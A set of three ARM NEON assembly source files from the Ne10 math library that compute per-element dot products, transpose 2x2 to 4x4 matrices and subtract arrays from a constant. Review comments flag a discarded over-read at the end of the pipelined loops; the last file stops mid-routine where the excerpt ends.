open-vela/external_Ne10 | 10,431 | modules/math/NE10_dot.neon.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_dot.neon.s
@
.text
.syntax unified
.include "NE10header.s"
.align 4
.global ne10_dot_vec2f_neon
.thumb
.thumb_func
ne10_dot_vec2f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ Computes dst[i] = src1[i].x*src2[i].x + src1[i].y*src2[i].y
@ (the dot product of each pair of 2D vectors).
@
@ arm_result_t dot_float(arm_float_t * dst,
@ arm_vec2f_t * src1,
@ arm_vec2f_t * src2,
@ unsigned int count)
@
@ r0: *dst & current dst entry's address
@ r1: *src1 & current src1 entry's address
@ r2: *src2 & current src2 entry's address
@ r3: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r4: the number of residual items that are processed at the beginning
@ of the input array (before the 4-at-a-time main loop)
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4}
and r4, r3, #3 @ r4 = count % 4; calculate the residual loop
asr r3, r3, #2 @ r3 = count >> 2; calculate the main loop
cbz r4, .L_check_mainloop_vec2
.L_residualloop_vec2:
@ process the residual items in the input array, one vec2 at a time
vld1.f32 d0, [r1]! @ d0 = { src1[i].x, src1[i].y }
vld1.f32 d1, [r2]! @ d1 = { src2[i].x, src2[i].y }
subs r4, r4, #1
@ calculate values
vmul.f32 d0, d0, d1 @ d0 = { x1*x2, y1*y2 }
vpadd.f32 d0, d0 @ pairwise add: d0[0] = x1*x2 + y1*y2
vst1.32 {d0[0]}, [r0]!
bgt .L_residualloop_vec2
.L_check_mainloop_vec2:
cbz r3, .L_return_vec2
@ load the current set of values (4 vec2's, de-interleaved:
@ q0 = all x components, q1 = all y components)
vld2.32 {q0-q1}, [r1]!
vld2.32 {q2-q3}, [r2]!
.L_mainloop_vec2:
@ calculate values for current set
vmul.f32 q8, q0, q2
vmla.f32 q8, q1, q3 @ q8 = x1*x2 + y1*y2 for 4 vectors
@ store the result for current set
vst1.32 {d16,d17}, [r0]!
subs r3, r3, #1
@ load the next set of values
@ NOTE(review): this software-pipelined loop issues one extra load on
@ the final iteration, reading 4 vec2's past the end of src1/src2 —
@ the values are discarded, but the over-read should be confirmed safe.
vld2.32 {q0-q1}, [r1]!
vld2.32 {q2-q3}, [r2]!
bgt .L_mainloop_vec2 @ loop if r3 > 0, if we have at least another 4 vectors (8 floats) to process
.L_return_vec2:
@ return NE10_OK (0)
pop {r4}
mov r0, #0
bx lr
.align 4
.global ne10_dot_vec3f_neon
.thumb
.thumb_func
ne10_dot_vec3f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ Computes dst[i] = src1[i].x*src2[i].x + src1[i].y*src2[i].y
@                 + src1[i].z*src2[i].z (3D dot product per element).
@
@ arm_result_t dot_float(arm_float_t * dst,
@ arm_vec3f_t * src1,
@ arm_vec3f_t * src2,
@ unsigned int count)
@
@ r0: *dst & current dst entry's address
@ r1: *src1 & current src1 entry's address
@ r2: *src2 & current src2 entry's address
@ r3: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r4: the number of residual items that are processed at the beginning
@ of the input array (before the 4-at-a-time main loop)
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4}
and r4, r3, #3 @ r4 = count % 4; calculate the residual loop
asr r3, r3, #2 @ r3 = count >> 2; calculate the main loop
cbz r4, .L_check_mainloop_vec3
.L_residualloop_vec3:
@ process the residual items in the input array, one vec3 at a time
vld3.f32 {d0[0], d2[0], d4[0]}, [r1]! @ The values are loaded like so:
@ q0 = { V1.x, -, -, - };
@ q1 = { V1.y, -, -, - };
@ q2 = { V1.z, -, -, - };
vld3.f32 {d1[0], d3[0], d5[0]}, [r2]! @ The values are loaded like so:
@ q0 = { V1.x, -, V2.x, - };
@ q1 = { V1.y, -, V2.y, - };
@ q2 = { V1.z, -, V2.z, - };
subs r4, r4, #1
@ accumulate x*x + y*y + z*z in lane d0[0]
vmul.f32 d0, d0, d1
vmla.f32 d0, d2, d3
vmla.f32 d0, d4, d5
vst1.32 {d0[0]}, [r0]!
bgt .L_residualloop_vec3
.L_check_mainloop_vec3:
cbz r3, .L_return_vec3
@ load current set of values (4 vec3's, de-interleaved:
@ q0 = x's, q1 = y's, q2 = z's; likewise q8-q10 for src2)
vld3.32 {d0, d2, d4}, [r1]!
vld3.32 {d1, d3, d5}, [r1]!
vld3.32 {d16, d18, d20}, [r2]!
vld3.32 {d17, d19, d21}, [r2]!
.L_mainloop_vec3:
@ calculate values for current set
vmul.f32 q15, q0, q8
vmla.f32 q15, q1, q9
vmla.f32 q15, q2, q10 @ q15 = 4 dot products
@ store the result for current set
vst1.32 {d30, d31}, [r0]!
subs r3, r3, #1
@ load the next set of values
@ NOTE(review): the pipelined loop performs one extra (discarded) load
@ past the end of src1/src2 on the final iteration — confirm the
@ over-read is acceptable for the callers' buffers.
vld3.32 {d0, d2, d4}, [r1]!
vld3.32 {d1, d3, d5}, [r1]!
vld3.32 {d16, d18, d20}, [r2]!
vld3.32 {d17, d19, d21}, [r2]!
bgt .L_mainloop_vec3 @ loop if r3 > 0, if we have at least another 4 vectors (12 floats) to process
.L_return_vec3:
@ return NE10_OK (0)
pop {r4}
mov r0, #0
bx lr
.align 4
.global ne10_dot_vec4f_neon
.thumb
.thumb_func
ne10_dot_vec4f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ Computes the 4D dot product of each pair of vectors:
@ dst[i] = x1*x2 + y1*y2 + z1*z2 + w1*w2.
@
@ arm_result_t dot_float(arm_float_t * dst,
@ arm_vec4f_t * src1,
@ arm_vec4f_t * src2,
@ unsigned int count)
@
@ r0: *dst & current dst entry's address
@ r1: *src1 & current src1 entry's address
@ r2: *src2 & current src2 entry's address
@ r3: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r4: the number of residual items that are processed at the beginning
@ of the input array (before the 4-at-a-time main loop)
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4}
and r4, r3, #3 @ r4 = count % 4; calculate the residual loop
asr r3, r3, #2 @ r3 = count >> 2; calculate the main loop
cbz r4, .L_check_mainloop_vec4
.L_residualloop_vec4:
@ process the residual items in the input array, one vec4 at a time
vld1.f32 {d0, d1}, [r1]! @ The values are loaded like so:
@ q0 = { V1.x, V1.y, V1.z, V1.w };
vld1.f32 {d2, d3}, [r2]! @ The values are loaded like so:
@ q1 = { V2.x, V2.y, V2.z, V2.w };
subs r4, r4, #1
@ multiply lanewise, then reduce the four products to a scalar
vmul.f32 q0, q0, q1
vadd.f32 d0, d0, d1 @ d0 = { x*x + z*z, y*y + w*w }
vpadd.f32 d0, d0 @ pairwise add: d0[0] = sum of all four products
vst1.32 {d0[0]}, [r0]!
bgt .L_residualloop_vec4
.L_check_mainloop_vec4:
cbz r3, .L_return_vec4
@ load current set of values (4 vec4's, de-interleaved:
@ q0 = x's, q1 = y's, q2 = z's, q3 = w's; likewise q8-q11 for src2)
vld4.32 {d0, d2, d4, d6}, [r1]!
vld4.32 {d1, d3, d5, d7}, [r1]!
vld4.32 {d16, d18, d20, d22}, [r2]!
vld4.32 {d17, d19, d21, d23}, [r2]!
.L_mainloop_vec4:
@ calculate values for current set
vmul.f32 q15, q0, q8
vmla.f32 q15, q1, q9
vmla.f32 q15, q2, q10
vmla.f32 q15, q3, q11 @ q15 = 4 dot products
@ store the result for current set
vst1.32 {d30, d31}, [r0]!
subs r3, r3, #1
@ load the next set of values
@ NOTE(review): the pipelined loop performs one extra (discarded) load
@ past the end of src1/src2 on the final iteration — confirm the
@ over-read is acceptable for the callers' buffers.
vld4.32 {d0, d2, d4, d6}, [r1]!
vld4.32 {d1, d3, d5, d7}, [r1]!
vld4.32 {d16, d18, d20, d22}, [r2]!
vld4.32 {d17, d19, d21, d23}, [r2]!
bgt .L_mainloop_vec4 @ loop if r3 > 0, if we have at least another 4 vectors (16 floats) to process
.L_return_vec4:
@ return NE10_OK (0)
pop {r4}
mov r0, #0
bx lr
|
open-vela/external_Ne10 | 10,872 | modules/math/NE10_transmat.neon.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_transmat.neon.s
@
.text
.syntax unified
.include "NE10header.s"
.include "NE10_detmat.neon.inc.s"
.balign 4
.global ne10_transmat_2x2f_neon
.thumb
.thumb_func
ne10_transmat_2x2f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ Transposes an array of 2x2 float matrices: dst[i] = src[i]^T.
@
@ arm_result_t ne10_transmat_2x2f(arm_mat2x2f_t * dst,
@ arm_mat2x2f_t * src,
@ unsigned int count)
@
@ r0: *dst & current dst entry's address
@ r1: *src1 & current src1 entry's address
@ r2: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r3: the number of items that are left to be processed at the end
@ of the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
and r3, r2, #3 @ r3 = count % 4;
sub r2, r2, r3 @ count = count - r2; This is what's left to be processed after this loop
cmp r2, #0
beq .L_check_mat2x2
.L_mainloop_mat2x2:
subs r2, r2, #4
@ load 4 matrices; vld4 de-interleaves so q8..q11 hold the
@ m11/m21/m12/m22 elements respectively of all 4 matrices
vld4.32 {d16, d18, d20, d22}, [r1]!
vld4.32 {d17, d19, d21, d23}, [r1]!
vswp q9, q10 @ swap the off-diagonal elements => transpose
vst4.32 {d16, d18, d20, d22}, [r0]!
vst4.32 {d17, d19, d21, d23}, [r0]!
bgt .L_mainloop_mat2x2 @ loop if r2 > 0, if we have at least another 4 matrices (16 floats) to process
.L_mainloopend_mat2x2:
.L_check_mat2x2:
@ check if anything left to process at the end of the input array
cmp r3, #0
ble .L_return_mat2x2
.L_secondloop_mat2x2:
@ process the last few items left in the input array, one matrix at a time
vld4.32 {d16[0], d18[0], d20[0], d22[0]}, [r1]!
vswp d18, d20 @ swap the off-diagonal elements => transpose
subs r3, r3, #1
vst4.32 {d16[0], d18[0], d20[0], d22[0]}, [r0]!
bgt .L_secondloop_mat2x2
.L_return_mat2x2:
@ return NE10_OK (0)
mov r0, #0
bx lr
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ This macro stores two transposed 3x3 matrices (held in q8-q13) to the
@ destination pointed to by r0, post-incrementing r0.
@ (The header previously claimed it "calculates the inverse"; it only
@ rearranges and stores.)
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro STORE_3x3TRNMATS
@ rearrange the results for use in a "vst3" instruction...
vtrn.32 q8 , q11
vtrn.32 q9 , q12
vtrn.32 q10, q13
@ each matrix is 9 floats: 6 via the full vst3 plus 3 via the lane vst3
vst3.32 { d16 , d18 , d20 }, [r0]!
vst3.32 { d17[0], d19[0], d21[0]}, [r0]!
vst3.32 { d22 , d24 , d26 }, [r0]!
vst3.32 { d23[0], d25[0], d27[0]}, [r0]!
.endm
.align 2
.global ne10_transmat_3x3f_neon
.thumb
.thumb_func
ne10_transmat_3x3f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ Transposes an array of 3x3 float matrices: dst[i] = src[i]^T.
@
@ arm_result_t ne10_transmat_3x3f(arm_mat3x3f_t * dst,
@ arm_mat3x3f_t * src1,
@ arm_mat3x3f_t * src2,
@ unsigned int count)
@
@ r0: *dst & current dst entry's address
@ r1: *src1 & current src1 entry's address
@ r2: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r3: the number of items that are left to be processed at the end
@ of the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
and r3, r2, #3 @ r3 = count % 4;
sub r2, r2, r3 @ count = count - r3; This is what's left to be processed after this loop
cmp r2, #0
beq .L_check_mat3x3
.L_mainloop_mat3x3:
@ load two 3x3 matrices into q8-q13 (macro from NE10_detmat.neon.inc.s)
LOAD_3x3MATS_ARGS d16, d17, d18, d19, d20, d21, d22, d23, d24, d25, d26, d27, q8, q9, q10, q11, q12, q13, r1
subs r2, r2, #2
@ swap off-diagonal element pairs of both matrices => transpose
vswp d20, d17
vswp d22, d18
vswp d26, d19
STORE_3x3TRNMATS
bgt .L_mainloop_mat3x3 @ loop if r2 > 0, i.e. at least another 2 matrices (18 floats) to process
.L_mainloopend_mat3x3:
.L_check_mat3x3:
@ check if anything left to process at the end of the input array
cmp r3, #0
ble .L_return_mat3x3
.L_secondloop_mat3x3:
@ process the last few items left in the input array, one matrix at a time
@ load the next (e.g. 3rd) set of values
vld3.32 { d16 , d18 , d20 }, [r1]!
vld3.32 { d17[0], d19[0], d21[0]}, [r1]!
@ NOTE(review): q11-q13 hold stale data here; the first vtrn set below is
@ undone by the second vtrn set after the swaps, so only q8-q10 matter.
vtrn.32 q8 , q11
vtrn.32 q9 , q12
vtrn.32 q10, q13
subs r3, r3, #1
vswp d20, d17
vswp d22, d18
vswp d26, d19
@ store the result for the last (e.g. 3rd) set
vtrn.32 q8 , q11
vtrn.32 q9 , q12
vtrn.32 q10, q13
vst3.32 { d16 , d18 , d20 }, [r0]!
vst3.32 { d17[0], d19[0], d21[0]}, [r0]!
bgt .L_secondloop_mat3x3
.L_return_mat3x3:
@ return NE10_OK (0)
mov r0, #0
bx lr
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ This macro stores two transposed 4x4 matrices (held in q8-q15) to the
@ destination pointed to by r0, post-incrementing r0.
@ (Despite the "_INVMATS" name, it does not invert anything; it only
@ re-interleaves and stores — it is used by the transpose routine below.)
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro STORE_4x4INVMATS
@ rearrange the results for use in a "vst4" instruction...
vtrn.32 q8, q12
vtrn.32 q9, q13
vtrn.32 q10, q14
vtrn.32 q11, q15
vst4.32 { d16 , d18 , d20 , d22 }, [r0]!
vst4.32 { d17 , d19 , d21 , d23 }, [r0]!
vst4.32 { d24 , d26 , d28 , d30 }, [r0]!
vst4.32 { d25 , d27 , d29 , d31 }, [r0]!
.endm
.align 2
.global ne10_transmat_4x4f_neon
.thumb
.thumb_func
ne10_transmat_4x4f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ Transposes an array of 4x4 float matrices: dst[i] = src[i]^T.
@
@ arm_result_t ne10_transmat_4x4f(arm_mat4x4f_t * dst,
@ arm_mat4x4f_t * src1,
@ arm_mat4x4f_t * src2,
@ unsigned int count)
@
@ r0: *dst & current dst entry's address
@ r1: *src1 & current src1 entry's address
@ r2: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r3: the number of items that are left to be processed at the end
@ of the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
and r3, r2, #3 @ r3 = count % 4;
sub r2, r2, r3 @ count = count - r3; This is what's left to be processed after this loop
cmp r2, #0
beq .L_check_mat4x4
.L_mainloop_mat4x4:
@ load two 4x4 matrices into q8-q15 (macro defined above)
LOAD_4x4MATS_ARGS d16, d17, d18, d19, d20, d21, d22, d23, d24, d25, d26, d27, d28, d29, d30, d31, q8, q9, q10, q11, q12, q13, q14, q15, r1
subs r2, r2, #2
@ swap off-diagonal element pairs of both matrices => transpose
vswp d18, d24
vswp d17, d20
vswp d22, d25
vswp d19, d28
vswp d27, d30
vswp d23, d29
STORE_4x4INVMATS
bgt .L_mainloop_mat4x4 @ loop if r2 > 0, i.e. at least another 2 matrices (32 floats) to process
.L_mainloopend_mat4x4:
.L_check_mat4x4:
@ check if anything left to process at the end of the input array
cmp r3, #0
ble .L_return_mat4x4
.L_secondloop_mat4x4:
@ process the last few items left in the input array, one matrix at a time
vld4.32 { d16 , d18 , d20 , d22 }, [r1]!
vld4.32 { d17 , d19 , d21 , d23 }, [r1]!
@ NOTE(review): q12-q15 hold stale data here; the first vtrn set below is
@ undone by the second vtrn set after the swaps, so only q8-q11 matter.
vtrn.32 q8, q12
vtrn.32 q9, q13
vtrn.32 q10, q14
vtrn.32 q11, q15
subs r3, r3, #1
vswp d18, d24
vswp d17, d20
vswp d22, d25
vswp d19, d28
vswp d27, d30
vswp d23, d29
@ store the results
vtrn.32 q8, q12
vtrn.32 q9, q13
vtrn.32 q10, q14
vtrn.32 q11, q15
vst4.32 { d16 , d18 , d20 , d22 }, [r0]!
vst4.32 { d17 , d19 , d21 , d23 }, [r0]!
bgt .L_secondloop_mat4x4
.L_return_mat4x4:
@ return NE10_OK (0)
mov r0, #0
bx lr
|
open-vela/external_Ne10 | 9,792 | modules/math/NE10_rsbc.asm.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_rsbc.asm.s
@
.text
.syntax unified
.include "NE10header.s"
.balign 4
.global ne10_rsbc_float_asm
.thumb
.thumb_func
ne10_rsbc_float_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ Reverse-subtract of a constant: dst[i] = cst - src[i].
@
@ arm_result_t ne10_rsbc_float(arm_vec2f_t * dst,
@ arm_float_t * src, const arm_float_t * cst,
@ unsigned int count)
@
@ r0: *dst
@ r1: *src
@ r2: cst (the float constant is passed by value in r2)
@ r3: int count
@
@ r3: loop counter
@ r5: current item's offset in both src[] and dst[]
@ r6: current source item's address made of base(r1)+offset(r5)
@ r7: current destination item's address made of base(r0)+offset(r5)
@
@ r4 is saved although unused here — presumably to keep the pushed
@ frame uniform with the sibling routines; TODO confirm.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5, r6, r7}
cbz r3, .LoopEndFloat
mov r5, #0
.LoopBeginFloat:
add r6, r1, r5 @ Get current source item's address in memory
vldr s1, [r6, #0] @ Load src[i]
vmov s3, r2 @ Get cst into register s3 (loop-invariant; could be hoisted)
vsub.f32 s10, s3, s1 @ s10 = cst - src[i]
add r7, r0, r5 @ Get current destination item's address in memory
vstr s10, [r7, #0] @ Store the result back into the main memory
add r5, r5, #4 @ increase the offset by 1*sizeof(float)
subs r3, r3, #1 @ count down using the current index (i--)
bne .LoopBeginFloat @ Continue if "i < count"
.LoopEndFloat:
mov r0, NE10_OK @ Return NE10_OK
pop {r4, r5, r6, r7}
bx lr
.balign 4
.global ne10_rsbc_vec2f_asm
.thumb
.thumb_func
ne10_rsbc_vec2f_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ Reverse-subtract of a constant vec2: dst[i] = *cst - src[i],
@ applied componentwise (x and y).
@
@ arm_result_t ne10_rsbc_vec2f(arm_vec2f_t * dst,
@ arm_vec2f_t * src, const arm_vec2f_t * cst,
@ unsigned int count)
@
@ r0: *dst
@ r1: *src
@ r2: *cst
@ r3: int count
@
@ r3: loop counter
@ r5: current item's offset in both src[] and dst[]
@ r6: current source item's address made of base(r1)+offset(r5)
@ r7: current destination item's address made of base(r0)+offset(r5)
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5, r6, r7}
cbz r3, .LoopEndVec2F
mov r5, #0
.LoopBeginVec2F:
add r6, r1, r5 @ Get current source item's address in memory
vldr s1, [r6, #0] @ Load src[i].x and src[i].y
vldr s2, [r6, #4]
vldr s3, [r2, #0] @ Load cst->x and cst->y (loop-invariant; could be hoisted)
vldr s4, [r2, #4]
vsub.f32 s10, s3, s1 @ s10 = cst->x - src[i].x
vsub.f32 s11, s4, s2 @ s11 = cst->y - src[i].y
add r7, r0, r5 @ Get current destination item's address in memory
vstr s10, [r7, #0] @ Store the results back into the main memory
vstr s11, [r7, #4]
add r5, r5, #8 @ increase the offset by 2*sizeof(float) (for x and y)
subs r3, r3, #1 @ count down using the current index (i--)
bne .LoopBeginVec2F @ Continue if "i < count"
.LoopEndVec2F:
mov r0, NE10_OK @ Return NE10_OK
pop {r4, r5, r6, r7}
bx lr
.balign 4
.global ne10_rsbc_vec3f_asm
.thumb
.thumb_func
ne10_rsbc_vec3f_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ Reverse-subtract of a constant vec3: dst[i] = *cst - src[i],
@ applied componentwise (x, y and z).
@
@ arm_result_t ne10_rsbc_vec3f(arm_vec3f_t * dst,
@ arm_vec3f_t * src, const arm_vec3f_t * cst,
@ unsigned int count)
@
@ r0: *dst
@ r1: *src
@ r2: *cst
@ r3: int count
@
@ r3: loop counter
@ r5: current item's offset in both src[] and dst[]
@ r6: current source item's address made of base(r1)+offset(r5)
@ r7: current destination item's address made of base(r0)+offset(r5)
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5, r6, r7}
cbz r3, .LoopEndVec3F
mov r5, #0
.LoopBeginVec3F:
add r6, r1, r5 @ Get current source item's address in memory
vldr s1, [r6, #0] @ Load src[i].x, src[i].y, and src[i].z
vldr s2, [r6, #4]
vldr s3, [r6, #8]
vldr s4, [r2, #0] @ Load cst->x, cst->y, and cst->z (loop-invariant; could be hoisted)
vldr s5, [r2, #4]
vldr s6, [r2, #8]
vsub.f32 s10, s4, s1 @ s10 = cst->x - src[i].x
vsub.f32 s11, s5, s2 @ s11 = cst->y - src[i].y
vsub.f32 s12, s6, s3 @ s12 = cst->z - src[i].z
add r7, r0, r5 @ Get current destination item's address in memory
vstr s10, [r7, #0] @ Store the results back into the main memory
vstr s11, [r7, #4]
vstr s12, [r7, #8]
add r5, r5, #12 @ increase the offset by 3*sizeof(float) (for x, y, and z)
subs r3, r3, #1 @ count down using the current index (i--)
bne .LoopBeginVec3F @ Continue if "i < count"
.LoopEndVec3F:
mov r0, NE10_OK @ Return NE10_OK
pop {r4, r5, r6, r7}
bx lr
.balign 4
.global ne10_rsbc_vec4f_asm
.thumb
.thumb_func
ne10_rsbc_vec4f_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ Reverse-subtract of a constant vec4: dst[i] = *cst - src[i],
@ applied componentwise (x, y, z and w).
@
@ arm_result_t ne10_rsbc_vec4f(arm_vec4f_t * dst,
@ arm_vec4f_t * src, const arm_vec4f_t * cst,
@ unsigned int count)
@
@ r0: *dst
@ r1: *src
@ r2: *cst
@ r3: int count
@
@ r3: loop counter
@ r5: current item's offset in both src[] and dst[]
@ r6: current source item's address made of base(r1)+offset(r5)
@ r7: current destination item's address made of base(r0)+offset(r5)
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5, r6, r7}
cbz r3, .LoopEndVec4F
mov r5, #0
.LoopBeginVec4F:
add r6, r1, r5 @ Get current source item's address in memory
vldr s1, [r6, #0] @ Load src[i].x, src[i].y, src[i].z, and w
vldr s2, [r6, #4]
vldr s3, [r6, #8]
vldr s4, [r6, #12]
vldr s5, [r2, #0] @ Load cst->x, cst->y, cst->z, and w (loop-invariant; could be hoisted)
vldr s6, [r2, #4]
vldr s7, [r2, #8]
vldr s8, [r2, #12]
vsub.f32 s10, s5, s1 @ s10 = cst->x - src[i].x
vsub.f32 s11, s6, s2 @ s11 = cst->y - src[i].y
vsub.f32 s12, s7, s3 @ s12 = cst->z - src[i].z
vsub.f32 s13, s8, s4 @ s13 = cst->w - src[i].w
add r7, r0, r5 @ Get current destination item's address in memory
vstr s10, [r7, #0] @ Store the results back into the main memory
vstr s11, [r7, #4]
vstr s12, [r7, #8]
vstr s13, [r7, #12]
add r5, r5, #16 @ increase the offset by 4*sizeof(float) (for x, y, z, and w)
subs r3, r3, #1 @ count down using the current index (i--)
bne .LoopBeginVec4F @ Continue if "i < count"
.LoopEndVec4F:
mov r0, NE10_OK @ Return NE10_OK
